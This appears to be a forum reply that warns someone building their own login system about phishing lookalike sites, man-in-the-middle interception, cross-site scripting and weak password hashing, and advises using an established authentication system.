| Spoofing. I start up faceb0ok.website or whatever and theme it to look identical to Facebook. I then make a viral Facebook post that tells you Facebook will send you a $50 Amazon gift card if you click on this link. You click, then instinctively log in with your Facebook credentials because you can't tell that you're not on the real Facebook anymore. I now have your credentials. Man-in-the-Middle (MITM). I'm at the same coffee shop as you and I've taken control of the router. You request your bank's web site and I'm able to route that request through my laptop, fetch the web page, and return it back to you. You log in to the web site. The connection is still encrypted, but the termination of the encryption is actually happening on my laptop. You log into the bank site. I now have your bank account credentials. Cross-site scripting (XSS). Your site allows visitors to embed content (for example, message board posts) without that content being properly filtered. I use that to embed some JavaScript that watches for users using the log in form on your site and send those credentials to me, or sends the content of the cookie of users already logged on. Poor hashing. You mentioned that above so you're probably aware of it already, but it's disturbing and surprising how many sites don't have this figured out yet. I'm not sure what problems network dropouts could cause, at least in terms of security - which is the big problem here. Of course there's more, but this is what comes to mind. In summary, I strongly suggest you don't try to reinvent a new authentication system. use one already in common use. It's probably already fairly battle-tested and validated for correctness and security. This goes for most other types of software as well. |